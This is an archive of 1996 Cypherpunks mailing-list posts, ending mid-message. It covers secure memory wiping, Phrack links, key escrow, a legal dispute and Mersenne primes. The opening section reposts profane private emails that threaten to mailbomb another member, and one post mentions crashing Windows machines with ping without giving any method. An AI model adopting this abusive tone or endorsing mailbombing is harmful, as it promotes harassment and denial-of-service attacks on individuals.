]You really don`t rate a reply from me, my time is much too valuable
]to bother with this sort of thing usually, but on this occasion i`ll
]make an exception:
]
]If you are going to make claims like this *back them up* I do not
]suppose for one moment that anyone on this list believes what you
]said above, Tim has shown restraint and sense in dealing with your
]rantings, you are in the majority of peoples killfiles, you really
]ought to re-access what you are doing on the list if all you are here
]for is to cause hassle and waste bandwidth, there is enough material
]on the list without totally uninteresting posts like your own.
<sig>

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Tue, 17 Sep 1996 19:33:09 +0000
]Subject: Re: Diffie Hellman - logs in Galois fields
]Message-Id: <842988785.23058.0@fatmans.demon.co.uk>
]
]> I think polluting this mailing list with trivial questions such as this is
]> just as bad as polluting it with personal attacks. Read the FAQs.
]
]Get a fucking life, seeing as you haven`t yet posted anything
]relating remotely to the technical aspects of cryptography to this
]list I think you need to take a long hard look at what your saying
]loser....
<sig>

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Wed, 18 Sep 1996 15:18:16 +0000
]Subject: Re: Workers Paradise. /Political rant.
]Message-Id: <843149202.18173.0@fatmans.demon.co.uk>
]
]> Yeah!!! And I'll bounce each mailbomb to everyone who tries it. Won't
]> that be fun.  Too ba your netcom account won't last long.
]
]`Fraid not loser, I`ll just mailbomb your ass so bad you won`t know
]what hit you, and my account is on demon, who can handle my incoming
]mail (about 300 a day) without a problem, go ahead punk, make my
]day..
<sig>

(I warned the mailbombers that their mailbombs will be returned to them.)

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 17:37:23 +0000
]Subject: Re: CIA hacked
]Message-Id: <843401979.17072.0@fatmans.demon.co.uk>
]
]> >Dr. John M. Grubor created the 'net.
]>
]> Who created you? You tub of shit?
]
]
]Fuck you and fuck your cheap ass fucked up life motherfucker (look
]for the fuck redundancy index here, should be an interesting figure,
]motherfucker)
]
]good day to you
<sig>

(Paul is writing to me in response to someone else's flame.)

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Subject: Re: Re: CIA hacked
]Message-Id: <843401966.17051.0@fatmans.demon.co.uk>
]
]This is a further post following an earlier flame:
]
]>  You are being flamed because.
]>
]>    [X] you continued a boring useless stupid thread
]>    [ ] you repeatedly posted to the same thread that you just posted to
]>    [x] you repeatedly initiated incoherent, flaky, and mindless threads
]>    [ ] you posted a piece riddled with profanities
]>    [ ] you advocated Net censorship
]>    [ ] you SCREAMED! (used all caps)
]>    [x] you posted some sort of crap that doesn't belong in this group
]>    [ ] you posted the inanely stupid 'Make Money Fast' article
]>    [ ] you threatened others with physical harm
]>    [x] you made a bigoted statement(s)
]>    [x] you repeatedly assumed unwarranted moral or intellectual superiority
]>    [x] you are under the misapprehension that this list is your preserve
]>    [ ] you repeatedly shown lack of humor
]>    [ ] you are apparently under compulsion to post to every thread
]>    [x] you are posting an anonymous attack
]>
]>   >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<
]
]Furthermore, you qualify as the celebrity fuckhead of the week, have
]a nice day.
<sig>

(I got dozens of the above-quoted mailbombs.)

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Subject: KOTM
]Message-Id: <843401961.17032.0@fatmans.demon.co.uk>
]
]Keep this non crypto relevant shit off the mailing list you sad ass
]motherfucker....
<sig>

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Message-Id: <843401965.17045.0@fatmans.demon.co.uk>
]
]Killifiling you would be a pleasure, however, it is an even greater
]pleasure to be able to flame you because of your worthless posts,
]this is probably why he didn`t...
]
]Get a life.
<sig>

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 28 Sep 1996 09:21:37 +0000
]Subject: Re: Possible subs attack????
]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
]
]-----BEGIN PGP SIGNED MESSAGE-----
]
]
]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
]
]> The lying sack of shit Timmy May lies again, as usual.
]
]Fuck you,
]
]I am not Tim May, Check out the return path if you don`t believe me,
]if you still don`t here`s my PGP public key signed by the EFF, they
]don`t sign keys here and there without checking ID`s...
]
]Type Bits/KeyID    Date       User ID
]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
]
]- -----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]- -----END PGP PUBLIC KEY BLOCK-----
<sig>

]Date: Mon, 30 Sep 1996 17:40:49 +0000
]Subject: [ADVICE] Dimitri Vilus`s personal attacks
]Message-Id: <844193560.12762.0@fatmans.demon.co.uk>
]
]I shouldn`t take any notice, he`s a loon who posts rants, lies, off
]topic rubbish and personal attacks to the mailing list. just ignore
]him, hopefully he`ll soon realise he`s not wanted and leave...
<sig>

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vitamin@best.com
Date: Sun, 1 Dec 1996 16:46:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.16.19961202024920.3fb73e1e@best.com>
MIME-Version: 1.0
Content-Type: text/plain



I apologize if this is off topic.

I received free one month trial in July from Netcom and in mid July I
canceled my account with
Netcom due to lousy customer service.  When I called I was treated rudely
because of 
canceling netcom.   I called again the next day and the person who answered
the phone 
apologized me for the behaviour of the previous employee and I was told my
account 
will be canceled.   Low and behold come July I got my credit card statement and 
netcom had billed me.  I promtly called them and was assured that my account
would 
be cancelled.  Come September I was billed again for August and September.  
Once again I called and she assured me  it would be cancelled.   Again, it
was not.   
Come October they still billed me.  In my November statement they are still
billing me.  

I prefer L.A.  Better Business Bureau and District Attorney emails and
physical addresses.

Someone please help me!!!!!

Thank You 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 1 Dec 1996 15:50:56 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Secure Memory Deletion
Message-ID: <199612012354.SAA13950@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know any papers on secure deletion of things from memory? That
is one thing that most people are oblivious to, though, if a program leaves
your unencrypted passkey laying in memory or a buffer of your plaintext,
then all the encryption in the world won't help. Should I overwrite the 32
times specified for hard drives, or are RAM chips easier to clear? Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@23kgroup.com (Paul J. Bell)
Date: Mon, 2 Dec 1996 00:04:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Codebreakers on the telly.
Message-ID: <9612020023.AA02372@23kgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


on tuesday, 3 dec at 2000 hrs, channel 13 (PBS) in the new york area will air
the Nova special, "The Codebreakers".  this isn't anything new, but, as i 
remember, it's worth watching again.

cheers,
	-paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyghte <lyghte@cyberhighway.net>
Date: Sun, 1 Dec 1996 18:32:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Phrack, where can i find it?
Message-ID: <199612020224.TAA29618@user1.cyberhighway.net>
MIME-Version: 1.0
Content-Type: text/plain



>where can i find latest (and old) phrack issues?
>
You can browse the old ones online at the phrack homepage
(http://freeside.com/phrack.html)


        _\ /_
         / \
               __         ___    __
    |    \ /  |  _   |_|   |    |_
THE |__   |   |__|   | |   |    |__

"It may roundly be asserted that human ingenuity cannot concoct a cipher
which human ingenuity cannot resolve."  Edgar Allan Poe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 1 Dec 1996 19:38:27 -0800 (PST)
To: Dale Thorn <unicorn@schloss.li
Subject: Re: denial of service and government rights
Message-ID: <3.0.32.19961201193842.00693604@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 12/1/96 -0800, Dale Thorn wrote:
>So what you're saying is I (or we) can testify in front of Congress on
>essentially any topic, telling a blatant lie (that we know is false, and
>which they will subsequently prove is false), and totally get away with
>it.  You and I can do that, is that what you're saying?

You and I can't. The government can. It is one thing to commit a crime (if
a crime has even been committed in the case in question). It is another
thing to find somebody willing to prosecute it.

In today's day and age, the Constitution exists for historical purposes
only. Much of it has long been abolished by the courts. The remainder is
being mostly ignored. The "Kein Kläger, kein Richter" principle makes it
irrelevant if doing so is illegal.

A favorite saying of 2nd Amendment supporters is: "Which part of 'shall not
be infringed' don't you understand?"

If society doesn't care that the Constitution is being violated, the
violations will continue. And society couldn't care less.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 1 Dec 1996 17:31:57 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Seditious Cable!
In-Reply-To: <yaZ0XD21w165w@bwalk.dm.com>
Message-ID: <199612020149.TAA00175@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> nobody@replay.com (Anonymous) writes:
> >clarify your position on key escrow to prevent further misunderstanding.
> 
> I'm sorry, I don't think I'm able to explain my views on any complex technical
> topic in terms so simple that they could be understood by the "cypher punks".

     Sounds like a personal failing to me.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 1 Dec 1996 17:12:17 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A1C811.244@gte.net>
Message-ID: <Pine.SUN.3.94.961201200504.5120Z-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Dec 1996, Dale Thorn wrote:

> Black Unicorn wrote: 
> > On Sat, 30 Nov 1996, Dale Thorn wrote:

> > > > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > > > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > > > view of the American people on television, that the Iraquis were throwing
> > > > babies out of incubators in Kuwait, thereby securing the necessary votes
> > > > in Congress to prosecute the Gulf War.
> 
> > At that time the country was already at war and if you read the war powers
> > act and look at the dates, you'll find that he probably could have
> > prosecuted it without congress.
> 
> Fraud is fraud.  It's illegal under *some* statute, I'm sure.

Point to it.

> 
> > 60 minutes did a nice piece on this, BTW, and even they admitted that the
> > wool might have been pulled over the eyes of the Bush Staff.
> 
> > > > When it was discovered (after the "war") that the Incubator Baby Scandal
> > > > was a lie, nobody was prosecuted.
> 
> > Prosecuted for what?
> 
> Fraud.  See above.

Give me a cite.

Fraud is an excellent answer because it is a meaningless answer.  Fraud is
traditionally used to prosecutue those not-quite-a-crime cases because the
definition essentially comes down to : "That guy did something we don't
like."

> 
> > > > Further, in blatant violation of the
> > > > U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
> > > > II of England.
> 
> > Careful.  The knighthoods in question (Knight's Cross of the Victorian
> > Order if I recall) do not infringe on foreign decorations restrictions
> > when they are granted in an honorary context, as both were - again if my
> > recall is correct.
> > Several American citizens have been inducted into foreign orders of merit
> > and some have been inducted into badge and even sash orders.
> > One noteable was even inducted into the Order of the Bath (extra points
> > for the name of said citizen).
> 
> According to the Constitution, "No title of nobility shall be granted by
> the United States, and no person holding any office of profit or trust
> under them shall, without the consent of the Congress, accept of any
> present, emolument, office or title, of any kind whatsoever, from any
> king, prince, or foreign state."

Honorary Knighthoods simply do not fall into this catagory.  There are
three or four cases on this point which I will dig up if enough people
complain.

In addition, I believe congressional approval was granted regardless for
Schwartzkopf.

Note that unlike your previous assertion, there is no rule regulating
these awards for the day to day citizen.

Playing loosey goosey with the facts seems to be a habit with you.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sun, 1 Dec 1996 20:14:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Secure Memory Deletion
Message-ID: <19961202041344041.AAA120@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Seems to me that the chip itself hardly a worry. memset() does the trick for the memory locations you are aware of. Any electrical or molecular level residues would be terribly difficult to sort out. 

The OS provides ample opportunities for unknowns though. ie, Is there some structure in memory that has the data from the user interface object used to collect the passphrase? Is there a keyboard buffer storing the last several (dozen? hundred?) keystrokes? Can 100% security be achieved at all with our current OS's?



>Mark Rosen (mrosen@peganet.com) said something about Secure Memory Deletion on or about 12/1/96 4:49 PM

>	Does anyone know any papers on secure deletion of things from
>memory? That
>is one thing that most people are oblivious to, though, if a program leaves
>your unencrypted passkey laying in memory or a buffer of your plaintext,
>then all the encryption in the world won't help. Should I overwrite the 32
>times specified for hard drives, or are RAM chips easier to clear? Thanks.
>
>End of message

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 1 Dec 1996 12:38:10 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A1C811.244@gte.net>
Message-ID: <Pine.LNX.3.94.961201203555.1279B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Dec 1996, Dale Thorn wrote:

> > Careful.  The knighthoods in question (Knight's Cross of the Victorian
> > Order if I recall) do not infringe on foreign decorations restrictions
> > when they are granted in an honorary context, as both were - again if my
> > recall is correct.
> > Several American citizens have been inducted into foreign orders of merit
> > and some have been inducted into badge and even sash orders.
> > One noteable was even inducted into the Order of the Bath (extra points
> > for the name of said citizen).
> 
> According to the Constitution, "No title of nobility shall be granted by
> the United States, and no person holding any office of profit or trust
> under them shall, without the consent of the Congress, accept of any
                                ^^^^^^^^^^^^^^^^^^^^^^^
> present, emolument, office or title, of any kind whatsoever, from any
> king, prince, or foreign state."
> 
> I would point out that the "any kind whatsoever" clause is clear enough,
> and as to whether Congress approved Bush et al for these honors, well,
> you tell me.

Yes, as a matter of fact, they did.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

It's difficult to see the picture when you are inside the frame.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqHsfjCdEh3oIPAVAQG1Jgf+K+GKyJwi6CjEYrIkksgZF0D2p3wbuNMl
NfI/T/mKBex11B6AC+XH0z7wGaSA7gAwEK7qZfJAWM/vfI/ryI8REKX7RpHpoeRf
yEAKemy+afej6xcMzrXEra1OB7htpukji4+T5x32ewiibCZvpx4yS1H5KW3/qcfx
1/oinXv59TRj0jmUuQyMHb4B99dp4ytDPzeqcudwCVmTyItQw72SMJYNKO4uykcO
wf2u09u47W23FIZOt5biD219KvczFu96cIcbnc7STQNGnG03ZUBxjx5PimtS7Uqd
VWvk8ljdkGvalr6ruK5zKf7izbJe3ZVsPh2n3+FDnewTu2OF8paDsg==
=IMyt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Dec 1996 18:30:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Phrack, where can i find it?
In-Reply-To: <199612012159.NAA22165@abraham.cs.berkeley.edu>
Message-ID: <9yeayD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> where can i find latest (and old) phrack issues?

If you look at http://www.arachy-online.com, it's got a link to
phrack at (I think) http://fc.net/phrack.
Also check out http://www.2600.com.
It's a shame that they've got links to EFF's Web site.
EFF is a dishonorable gang of content-based censors and plug-pullers.
They support business owners and oppose free speech on the net.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sun, 1 Dec 1996 21:22:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Good Doctor (Dobb that is) on DSNT
Message-ID: <19961202052143928.AAA189@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


The January 1997 Dr. Dobb's Journal has a somewhat interesting interview with Eva Bozoki, Chief Scientist for Digital Secured Networks which more about scientific research in the old USSR as it does about VPN's and encryption. Some notable quotes from Ms. Bozoki:

"If people understand our competence, they will trust the product."

"I don't like key escrow because I don't trust anybody."

"We add a twist by encrypting the public key exchange."

Seems like the interviewer had a nice chat with Ms. Bozoki but it is a shame that he did not press her on more technical details. It is after all a programmer's journal. I find the first two quotes interesting in that it would appear that Ms. Bozoki would not purchase the product she is creating! In order to establish trust in an encryption product more is required than simply agreeing that the company is competent. Competence does not imply trustworthiness. Trust can be established through review and examination of the innards, algo's and source code. A quick read of www.dsnt.com does not reveal any additional information on the crypto used (other than it being a 512 byte public key algo using Diffie-Hellman key exchange). Yet it would seem that DSNT has painted themselves into a corner as revealing their architecture would make encrypting the public keys ineffective.

The interviewer also failed to press Ms. Bozoki for a position regarding key escrow. She states that she does not like key escrow but she does say (when discussing how security is being retrofitted into TCP/IP) "So you have to make sure that certain secrets don't go out and that you can legally wiretap certain conversations in a situation which wasn't designed for that." And also she mentions "the need for a government to defend its country". So does DSNT's products support wiretapping out of the box? 


--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sun, 1 Dec 1996 21:31:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Good Doctor again
Message-ID: <19961202053027130.AAA190@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Also in the January issue has an article on RIPEMD-160. Source code (and full article text) is available at www.program.com/source/crypto

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sun, 1 Dec 1996 18:57:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: pseudonymous servers
Message-ID: <9612020244.AA07946@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Which pseudonymous servers are currently active?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Dec 1996 21:56:49 -0800 (PST)
To: "Cypherpunks list" <unde0275@frank.mtsu.edu>
Subject: Re: IP address
Message-ID: <19961202055418796.AAA68@rn240.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Dec 1996 22:23:30 -0600, Internaut wrote:

>What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut

Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
machine can be locked up or rebooted at *any* time using just PING!

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 1 Dec 1996 22:09:03 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
Message-ID: <3.0.32.19961201220509.0068a234@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 12/1/96 -0800, Dale Thorn wrote:
>So what you're saying is I (or we) can testify in front of Congress on
>essentially any topic, telling a blatant lie (that we know is false, and
>which they will subsequently prove is false), and totally get away with
>it.  You and I can do that, is that what you're saying?

This is idiotic. I suspect it's deliberately idiotic, but I can't see what
anyone gains by it. If you've got a point to make, would you please just
say what you're thinking and move on? 

There's a big difference between something being punishable and someone
being punished. The false testimony was given on behalf of a friendly
government, and in favor of a cause which met with widespread national
support and was the focus of much (literal) flag-waving and patriotic
speechifying. In general, you face very few risks if you lie in a way which
helps a very popular cause, and the people you're lying to want to do the
thing that your lies are purportedly justifying. Your risks are much
greater if you're saying something unpopular or if you are an unpopular
person. I'm not talking about law, I'm talking about politics. And the fact
that laws are sometimes enforced in a political matter shouldn't be news to
anyone. (I'm not saying that's good, but I think it's attributable to and a
result of to the general fallibility of human beings, myself included, so
I'm skeptical about easy answers. Real-world solutions tend to fall short
of theoretical perfection. Doh.) 

>If that is true, then my original contention that things are far worse
>than the person I originally responded to was imagining, stands as
>correct.  Things are bad indeed.

I'd sure appreciate it if you'd just say what you're thinking (if it's
on-topic) instead of playing stupid "Is X true? Is Y true? Wow! I've just
discovered something new!" games. Your comments suggest to me that what
you're dancing around is, essentially, that the government is morally wrong
because it (eliding distinctions between governments and branches of
governments) enforces laws in an erratic or discriminatory or political
fashion. That's what I'm extracting from your messages. If there's
something more to what you're saying, I think I'd have a better chance of
extracting it if you devoted less energy to tricky rhetorical strategies. 


--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Sun, 1 Dec 1996 20:24:36 -0800 (PST)
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: IP address
Message-ID: <01BBDFD6.61E65120@s10-pm04.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sun, 1 Dec 1996 19:31:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A quick discussion of Mersenne Numbers
Message-ID: <961201223116_1486872145@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-01 16:17:01 EST, you write:

>  On Sun, 1 Dec 1996 Scottauge@aol.com wrote:
>  
>  > I wake of the latest find announcement, some people maybe wondering what

> the
>  > heck is this?!!
>  > 
>  > A mercenne number is of the type:
>  > 
>  > M(p) = 2**p -1 results in a prime when p is a prime.
>  > 
>  > Hopefully this will lead the way to see the pattern of prime numbers and
>  > being able to compute prime numbers in a far more efficient manner
(after 
> all
>  > a function that when given a prime number results in a prime number
would 
> be
>  > quite a kicker now wouldn't it!)
>  
>  It doesn't.  If q is a Mercenne prime, then p is prime if q = 2^p-1.  It
>  doesn't work the other way around.  If it did, then it would be very easy
to
>  find out if a number is a Mercenne prime: just add 1 and find the base 2
>  logarithm and if the result is prime, then the original number is prime.
 It'
> s
>  much more difficult than that.  It would also be possible to find an 
> infinite
>  number of Mercenne primes using a deterministic algorithm.
>  
>  
>  Mark

I agree, my discussion was toooooo quick and the statement:

>  > M(p) = 2**p -1 results in a prime when p is a prime.

is misleading.  I was thinking the second paragraph when I was writing the
statement statement above.  A case of the mind working faster than the
fingers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 1 Dec 1996 19:43:37 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A22FE8.2A1D@gte.net>
Message-ID: <Pine.SUN.3.94.961201224004.2080A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Dec 1996, Dale Thorn wrote:

> Black Unicorn wrote:
> > On Sun, 1 Dec 1996, Dale Thorn wrote:
> > > Black Unicorn wrote:
> > > > On Sat, 30 Nov 1996, Dale Thorn wrote:
> > > > > > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > > > > > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > > > > > view of the American people on television, that the Iraquis were throwing
> > > > > > babies out of incubators in Kuwait, thereby securing the necessary votes
> > > > > > in Congress to prosecute the Gulf War.
> 
> [snippo]
> 
> > Fraud is an excellent answer because it is a meaningless answer.  Fraud is
> > traditionally used to prosecutue those not-quite-a-crime cases because the
> > definition essentially comes down to : "That guy did something we don't
> > like."
> 
> [much drivel snipped]
> 
> So what you're saying is I (or we) can testify in front of Congress on
> essentially any topic, telling a blatant lie (that we know is false, and
> which they will subsequently prove is false), and totally get away with
> it.  You and I can do that, is that what you're saying?

What you're talking about is contempt of congress.  This is not "fraud."

The penality imposed would be purjury.  I don't believe that during that
discussion, the witness was sworn, but I could be mistaken.  In any event,
purjury is purjury, but it hardly rises to the level of conspiracy your
post originally indicated.

> If that is true, then my original contention that things are far worse
> than the person I originally responded to was imagining, stands as
> correct.  Things are bad indeed.

"I had no idea what I was talking about, but as luck would have it I was
right anyhow."

Here, have a bozo button.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 1 Dec 1996 20:38:41 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: denial of service and government rights
In-Reply-To: <32A22FE8.2A1D@gte.net>
Message-ID: <199612020456.WAA00652@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr Thorn wrote:
> Black Unicorn wrote:
> > Fraud is an excellent answer because it is a meaningless answer.  Fraud is
> > traditionally used to prosecutue those not-quite-a-crime cases because the
> > definition essentially comes down to : "That guy did something we don't
> > like."
> [much drivel snipped]
> So what you're saying is I (or we) can testify in front of Congress on
> essentially any topic, telling a blatant lie (that we know is false, and
> which they will subsequently prove is false), and totally get away with
> it.  You and I can do that, is that what you're saying?

     (I am going to spell this wrong) Perjury. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 1 Dec 1996 21:30:10 -0800 (PST)
To: Scottauge@aol.com
Subject: Re: A quick discussion of Mersenne Numbers
Message-ID: <199612020529.XAA24879@cdale3.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: Scottauge@aol.com, cypherpunks@toad.com
Date: Sun Dec 01 23:29:04 1996
> 
> I wake of the latest find announcement, some people maybe wondering what
>  the
> heck is this?!!
> 
> A mercenne number is of the type:
> 
> M(p) = 2**p -1 results in a prime when p is a prime.
> 

Oh, if only it were all that easy...

For more information on Mersenne primes, and using those spare
